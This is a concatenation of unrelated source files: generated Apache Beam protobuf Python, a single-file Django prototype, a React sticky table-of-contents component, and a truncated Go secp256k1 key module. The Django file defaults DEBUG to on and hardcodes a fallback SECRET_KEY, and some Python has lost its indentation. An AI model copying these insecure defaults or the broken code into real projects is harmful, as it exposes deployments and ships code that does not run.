# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindow)
))
,
AfterProcessingTime = _reflection.GeneratedProtocolMessageType('AfterProcessingTime', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERPROCESSINGTIME,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterProcessingTime)
))
,
AfterSynchronizedProcessingTime = _reflection.GeneratedProtocolMessageType('AfterSynchronizedProcessingTime', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.AfterSynchronizedProcessingTime)
))
,
Default = _reflection.GeneratedProtocolMessageType('Default', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_DEFAULT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.Default)
))
,
ElementCount = _reflection.GeneratedProtocolMessageType('ElementCount', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_ELEMENTCOUNT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.ElementCount)
))
,
Never = _reflection.GeneratedProtocolMessageType('Never', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_NEVER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.Never)
))
,
Always = _reflection.GeneratedProtocolMessageType('Always', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_ALWAYS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.Always)
))
,
OrFinally = _reflection.GeneratedProtocolMessageType('OrFinally', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_ORFINALLY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.OrFinally)
))
,
Repeat = _reflection.GeneratedProtocolMessageType('Repeat', (_message.Message,), dict(
DESCRIPTOR = _TRIGGER_REPEAT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger.Repeat)
))
,
DESCRIPTOR = _TRIGGER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Trigger)
))
_sym_db.RegisterMessage(Trigger)
_sym_db.RegisterMessage(Trigger.AfterAll)
_sym_db.RegisterMessage(Trigger.AfterAny)
_sym_db.RegisterMessage(Trigger.AfterEach)
_sym_db.RegisterMessage(Trigger.AfterEndOfWindow)
_sym_db.RegisterMessage(Trigger.AfterProcessingTime)
_sym_db.RegisterMessage(Trigger.AfterSynchronizedProcessingTime)
_sym_db.RegisterMessage(Trigger.Default)
_sym_db.RegisterMessage(Trigger.ElementCount)
_sym_db.RegisterMessage(Trigger.Never)
_sym_db.RegisterMessage(Trigger.Always)
_sym_db.RegisterMessage(Trigger.OrFinally)
_sym_db.RegisterMessage(Trigger.Repeat)
TimestampTransform = _reflection.GeneratedProtocolMessageType('TimestampTransform', (_message.Message,), dict(
Delay = _reflection.GeneratedProtocolMessageType('Delay', (_message.Message,), dict(
DESCRIPTOR = _TIMESTAMPTRANSFORM_DELAY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimestampTransform.Delay)
))
,
AlignTo = _reflection.GeneratedProtocolMessageType('AlignTo', (_message.Message,), dict(
DESCRIPTOR = _TIMESTAMPTRANSFORM_ALIGNTO,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimestampTransform.AlignTo)
))
,
DESCRIPTOR = _TIMESTAMPTRANSFORM,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.TimestampTransform)
))
_sym_db.RegisterMessage(TimestampTransform)
_sym_db.RegisterMessage(TimestampTransform.Delay)
_sym_db.RegisterMessage(TimestampTransform.AlignTo)
SideInput = _reflection.GeneratedProtocolMessageType('SideInput', (_message.Message,), dict(
DESCRIPTOR = _SIDEINPUT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.SideInput)
))
_sym_db.RegisterMessage(SideInput)
Environment = _reflection.GeneratedProtocolMessageType('Environment', (_message.Message,), dict(
DESCRIPTOR = _ENVIRONMENT,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.Environment)
))
_sym_db.RegisterMessage(Environment)
StandardEnvironments = _reflection.GeneratedProtocolMessageType('StandardEnvironments', (_message.Message,), dict(
DESCRIPTOR = _STANDARDENVIRONMENTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.StandardEnvironments)
))
_sym_db.RegisterMessage(StandardEnvironments)
DockerPayload = _reflection.GeneratedProtocolMessageType('DockerPayload', (_message.Message,), dict(
DESCRIPTOR = _DOCKERPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DockerPayload)
))
_sym_db.RegisterMessage(DockerPayload)
ProcessPayload = _reflection.GeneratedProtocolMessageType('ProcessPayload', (_message.Message,), dict(
EnvEntry = _reflection.GeneratedProtocolMessageType('EnvEntry', (_message.Message,), dict(
DESCRIPTOR = _PROCESSPAYLOAD_ENVENTRY,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry)
))
,
DESCRIPTOR = _PROCESSPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ProcessPayload)
))
_sym_db.RegisterMessage(ProcessPayload)
_sym_db.RegisterMessage(ProcessPayload.EnvEntry)
SdkFunctionSpec = _reflection.GeneratedProtocolMessageType('SdkFunctionSpec', (_message.Message,), dict(
DESCRIPTOR = _SDKFUNCTIONSPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.SdkFunctionSpec)
))
_sym_db.RegisterMessage(SdkFunctionSpec)
FunctionSpec = _reflection.GeneratedProtocolMessageType('FunctionSpec', (_message.Message,), dict(
DESCRIPTOR = _FUNCTIONSPEC,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.FunctionSpec)
))
_sym_db.RegisterMessage(FunctionSpec)
DisplayData = _reflection.GeneratedProtocolMessageType('DisplayData', (_message.Message,), dict(
Identifier = _reflection.GeneratedProtocolMessageType('Identifier', (_message.Message,), dict(
DESCRIPTOR = _DISPLAYDATA_IDENTIFIER,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DisplayData.Identifier)
))
,
Item = _reflection.GeneratedProtocolMessageType('Item', (_message.Message,), dict(
DESCRIPTOR = _DISPLAYDATA_ITEM,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DisplayData.Item)
))
,
Type = _reflection.GeneratedProtocolMessageType('Type', (_message.Message,), dict(
DESCRIPTOR = _DISPLAYDATA_TYPE,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DisplayData.Type)
))
,
DESCRIPTOR = _DISPLAYDATA,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.DisplayData)
))
_sym_db.RegisterMessage(DisplayData)
_sym_db.RegisterMessage(DisplayData.Identifier)
_sym_db.RegisterMessage(DisplayData.Item)
_sym_db.RegisterMessage(DisplayData.Type)
MessageWithComponents = _reflection.GeneratedProtocolMessageType('MessageWithComponents', (_message.Message,), dict(
DESCRIPTOR = _MESSAGEWITHCOMPONENTS,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.MessageWithComponents)
))
_sym_db.RegisterMessage(MessageWithComponents)
ExecutableStagePayload = _reflection.GeneratedProtocolMessageType('ExecutableStagePayload', (_message.Message,), dict(
SideInputId = _reflection.GeneratedProtocolMessageType('SideInputId', (_message.Message,), dict(
DESCRIPTOR = _EXECUTABLESTAGEPAYLOAD_SIDEINPUTID,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId)
))
,
UserStateId = _reflection.GeneratedProtocolMessageType('UserStateId', (_message.Message,), dict(
DESCRIPTOR = _EXECUTABLESTAGEPAYLOAD_USERSTATEID,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId)
))
,
TimerId = _reflection.GeneratedProtocolMessageType('TimerId', (_message.Message,), dict(
DESCRIPTOR = _EXECUTABLESTAGEPAYLOAD_TIMERID,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId)
))
,
DESCRIPTOR = _EXECUTABLESTAGEPAYLOAD,
__module__ = 'beam_runner_api_pb2'
# @@protoc_insertion_point(class_scope:org.apache.beam.model.pipeline.v1.ExecutableStagePayload)
))
_sym_db.RegisterMessage(ExecutableStagePayload)
_sym_db.RegisterMessage(ExecutableStagePayload.SideInputId)
_sym_db.RegisterMessage(ExecutableStagePayload.UserStateId)
_sym_db.RegisterMessage(ExecutableStagePayload.TimerId)
google_dot_protobuf_dot_descriptor__pb2.EnumValueOptions.RegisterExtension(beam_urn)
google_dot_protobuf_dot_descriptor__pb2.EnumValueOptions.RegisterExtension(beam_constant)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n!org.apache.beam.model.pipeline.v1B\tRunnerApiZ\013pipeline_v1'))
_BEAMCONSTANTS_CONSTANTS.values_by_name["MIN_TIMESTAMP_MILLIS"].has_options = True
_BEAMCONSTANTS_CONSTANTS.values_by_name["MIN_TIMESTAMP_MILLIS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\021-9223372036854775'))
_BEAMCONSTANTS_CONSTANTS.values_by_name["MAX_TIMESTAMP_MILLIS"].has_options = True
_BEAMCONSTANTS_CONSTANTS.values_by_name["MAX_TIMESTAMP_MILLIS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\0209223372036854775'))
_BEAMCONSTANTS_CONSTANTS.values_by_name["GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS"].has_options = True
_BEAMCONSTANTS_CONSTANTS.values_by_name["GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\0209223371950454775'))
_COMPONENTS_TRANSFORMSENTRY.has_options = True
_COMPONENTS_TRANSFORMSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_COMPONENTS_PCOLLECTIONSENTRY.has_options = True
_COMPONENTS_PCOLLECTIONSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_COMPONENTS_WINDOWINGSTRATEGIESENTRY.has_options = True
_COMPONENTS_WINDOWINGSTRATEGIESENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_COMPONENTS_CODERSENTRY.has_options = True
_COMPONENTS_CODERSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_COMPONENTS_ENVIRONMENTSENTRY.has_options = True
_COMPONENTS_ENVIRONMENTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_PTRANSFORM_INPUTSENTRY.has_options = True
_PTRANSFORM_INPUTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_PTRANSFORM_OUTPUTSENTRY.has_options = True
_PTRANSFORM_OUTPUTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["PAR_DO"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["PAR_DO"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033urn:beam:transform:pardo:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["FLATTEN"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["FLATTEN"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\031beam:transform:flatten:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["GROUP_BY_KEY"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["GROUP_BY_KEY"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\036beam:transform:group_by_key:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["IMPULSE"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["IMPULSE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\031beam:transform:impulse:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["ASSIGN_WINDOWS"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["ASSIGN_WINDOWS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:window_into:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["TEST_STREAM"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["TEST_STREAM"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005 urn:beam:transform:teststream:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["MAP_WINDOWS"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["MAP_WINDOWS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:map_windows:v1'))
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["MERGE_WINDOWS"].has_options = True
_STANDARDPTRANSFORMS_PRIMITIVES.values_by_name["MERGE_WINDOWS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\037beam:transform:merge_windows:v1'))
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.values_by_name["READ"].has_options = True
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.values_by_name["READ"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\026beam:transform:read:v1'))
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.values_by_name["CREATE_VIEW"].has_options = True
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES.values_by_name["CREATE_VIEW"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:create_view:v1'))
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["COMBINE_PER_KEY"].has_options = True
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["COMBINE_PER_KEY"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005!beam:transform:combine_per_key:v1'))
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["COMBINE_GLOBALLY"].has_options = True
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["COMBINE_GLOBALLY"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\"beam:transform:combine_globally:v1'))
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["RESHUFFLE"].has_options = True
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["RESHUFFLE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:transform:reshuffle:v1'))
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["WRITE_FILES"].has_options = True
_STANDARDPTRANSFORMS_COMPOSITES.values_by_name["WRITE_FILES"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:write_files:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PGBKCV"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PGBKCV"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005 beam:transform:combine_pgbkcv:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_MERGE_ACCUMULATORS"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_MERGE_ACCUMULATORS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:combine_merge_accumulators:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_EXTRACT_OUTPUTS"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_EXTRACT_OUTPUTS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005)beam:transform:combine_extract_outputs:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_PRECOMBINE"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_PRECOMBINE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:combine_per_key_precombine:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_MERGE_ACCUMULATORS"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_MERGE_ACCUMULATORS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\0054beam:transform:combine_per_key_merge_accumulators:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_EXTRACT_OUTPUTS"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_PER_KEY_EXTRACT_OUTPUTS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\0051beam:transform:combine_per_key_extract_outputs:v1'))
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_GROUPED_VALUES"].has_options = True
_STANDARDPTRANSFORMS_COMBINECOMPONENTS.values_by_name["COMBINE_GROUPED_VALUES"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005(beam:transform:combine_grouped_values:v1'))
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PAIR_WITH_RESTRICTION"].has_options = True
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PAIR_WITH_RESTRICTION"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005+beam:transform:sdf_pair_with_restriction:v1'))
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["SPLIT_RESTRICTION"].has_options = True
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["SPLIT_RESTRICTION"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\'beam:transform:sdf_split_restriction:v1'))
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PROCESS_KEYED_ELEMENTS"].has_options = True
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PROCESS_KEYED_ELEMENTS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:sdf_process_keyed_elements:v1'))
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PROCESS_ELEMENTS"].has_options = True
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS.values_by_name["PROCESS_ELEMENTS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005&beam:transform:sdf_process_elements:v1'))
_STANDARDSIDEINPUTTYPES_ENUM.values_by_name["ITERABLE"].has_options = True
_STANDARDSIDEINPUTTYPES_ENUM.values_by_name["ITERABLE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:side_input:iterable:v1'))
_STANDARDSIDEINPUTTYPES_ENUM.values_by_name["MULTIMAP"].has_options = True
_STANDARDSIDEINPUTTYPES_ENUM.values_by_name["MULTIMAP"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:side_input:multimap:v1'))
_PARDOPAYLOAD_SIDEINPUTSENTRY.has_options = True
_PARDOPAYLOAD_SIDEINPUTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_PARDOPAYLOAD_STATESPECSENTRY.has_options = True
_PARDOPAYLOAD_STATESPECSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_PARDOPAYLOAD_TIMERSPECSENTRY.has_options = True
_PARDOPAYLOAD_TIMERSPECSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY.has_options = True
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
_STANDARDCODERS_ENUM.values_by_name["BYTES"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["BYTES"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:coder:bytes:v1'))
_STANDARDCODERS_ENUM.values_by_name["KV"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["KV"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\020beam:coder:kv:v1'))
_STANDARDCODERS_ENUM.values_by_name["VARINT"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["VARINT"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\024beam:coder:varint:v1'))
_STANDARDCODERS_ENUM.values_by_name["ITERABLE"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["ITERABLE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\026beam:coder:iterable:v1'))
_STANDARDCODERS_ENUM.values_by_name["TIMER"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["TIMER"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:coder:timer:v1'))
_STANDARDCODERS_ENUM.values_by_name["INTERVAL_WINDOW"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["INTERVAL_WINDOW"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:coder:interval_window:v1'))
_STANDARDCODERS_ENUM.values_by_name["LENGTH_PREFIX"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["LENGTH_PREFIX"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:coder:length_prefix:v1'))
_STANDARDCODERS_ENUM.values_by_name["GLOBAL_WINDOW"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["GLOBAL_WINDOW"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:coder:global_window:v1'))
_STANDARDCODERS_ENUM.values_by_name["WINDOWED_VALUE"].has_options = True
_STANDARDCODERS_ENUM.values_by_name["WINDOWED_VALUE"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\034beam:coder:windowed_value:v1'))
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["DOCKER"].has_options = True
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["DOCKER"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\022beam:env:docker:v1'))
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["PROCESS"].has_options = True
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["PROCESS"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:env:process:v1'))
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["EXTERNAL"].has_options = True
_STANDARDENVIRONMENTS_ENVIRONMENTS.values_by_name["EXTERNAL"]._options = _descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\024beam:env:external:v1'))
_PROCESSPAYLOAD_ENVENTRY.has_options = True
_PROCESSPAYLOAD_ENVENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
# @@protoc_insertion_point(module_scope)
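# Editor's note: a minimal usage sketch, not generated code. It assumes the
# FunctionSpec message registered above exposes a string 'urn' field; the URN
# value is purely illustrative.
def _example_function_spec_round_trip():
    # Build a message, serialize it, and parse it back to confirm the field survives.
    spec = FunctionSpec(urn='beam:transform:pardo:v1')
    data = spec.SerializeToString()
    assert FunctionSpec.FromString(data).urn == 'beam:transform:pardo:v1'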
prototypes.py | import sys
import os
from django.conf import settings
DEBUG = os.environ.get('DEBUG', 'on') == 'on'
SECRET_KEY = os.environ.get('SECRET_KEY', 'a^hi#2sv)yy%v(6fhlv(j@-5e%+7h*d%#g%+ru(hv-7rj08r7n')
ALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS', 'localhost').split(',')
BASE_DIR = os.path.dirname(__file__)
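# Configure Django directly from this module instead of a separate settings module,
# so the whole prototype can live in a single file.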
settings.configure(
DEBUG=DEBUG,
SECRET_KEY=SECRET_KEY,
ALLOWED_HOSTS=ALLOWED_HOSTS,
ROOT_URLCONF='sitebuilder.urls',
MIDDLEWARE_CLASSES=(),
INSTALLED_APPS=(
'django.contrib.staticfiles',
'sitebuilder'
),
TEMPLATES=(
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True
        },
    ),
    STATIC_URL='/static/',
SITE_PAGES_DIRECTORY=os.path.join(BASE_DIR, 'pages'),
SITE_OUTPUT_DIRECTORY=os.path.join(BASE_DIR, '_build'),
STATIC_ROOT=os.path.join(BASE_DIR, '_build', 'static'),
STATICFILES_STORAGE='django.contrib.staticfiles.storage.CachedStaticFilesStorage'
)
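# With settings configured above, this file doubles as manage.py, e.g.:
#   python prototypes.py runserver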
if __name__ == '__main__':
from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
TableOfContentsList.tsx | import Scrollspy from 'react-scrollspy';
import {styled, themeGet} from '@twilio-paste/styling-library';
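// Styled Scrollspy list that stays pinned to the top of the viewport while scrolling
// and sets itself off with a weak left border from the Paste theme.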
export const TableOfContentsList = styled(Scrollspy)`
position: sticky;
top: 0;
  right: 0;
  margin: 0;
padding: 0;
list-style: none;
border-left-width: 1px;
border-left-style: solid;
border-left-color: ${themeGet('borderColors.colorBorderWeak')};
`;
secp256k1.go | package crypto
import (
"bytes"
"crypto/ecdsa"
ethcrypto "github.com/ethereum/go-ethereum/crypto"
ethsecp256k1 "github.com/ethereum/go-ethereum/crypto/secp256k1"
authtypes "github.com/cosmos/cosmos-sdk/x/auth/types"
tmcrypto "github.com/tendermint/tendermint/crypto"
)
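// init registers the Ethereum-style secp256k1 key types with the Cosmos SDK auth
// codec so they can be amino-encoded alongside the built-in Tendermint key types.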
func init() {
authtypes.RegisterKeyTypeCodec(PubKeySecp256k1{}, PubKeyAminoName)
authtypes.RegisterKeyTypeCodec(PrivKeySecp256k1{}, PrivKeyAminoName)
}
// ----------------------------------------------------------------------------
// secp256k1 Private Key
var _ tmcrypto.PrivKey = PrivKeySecp256k1{}
// PrivKeySecp256k1 defines a type alias for an ecdsa.PrivateKey that implements
// Tendermint's PrivateKey interface.
type PrivKeySecp256k1 []byte
// GenerateKey generates a new random private key. It returns an error upon
// failure.
func GenerateKey() (PrivKeySecp256k1, error) {
priv, err := ethcrypto.GenerateKey()
if err != nil {
return PrivKeySecp256k1{}, err
}
return PrivKeySecp256k1(ethcrypto.FromECDSA(priv)), nil
}
// PubKey returns the ECDSA private key's public key.
func (privkey PrivKeySecp256k1) PubKey() tmcrypto.PubKey {
ecdsaPKey := privkey.ToECDSA()
return PubKeySecp256k1(ethcrypto.FromECDSAPub(&ecdsaPKey.PublicKey))
}
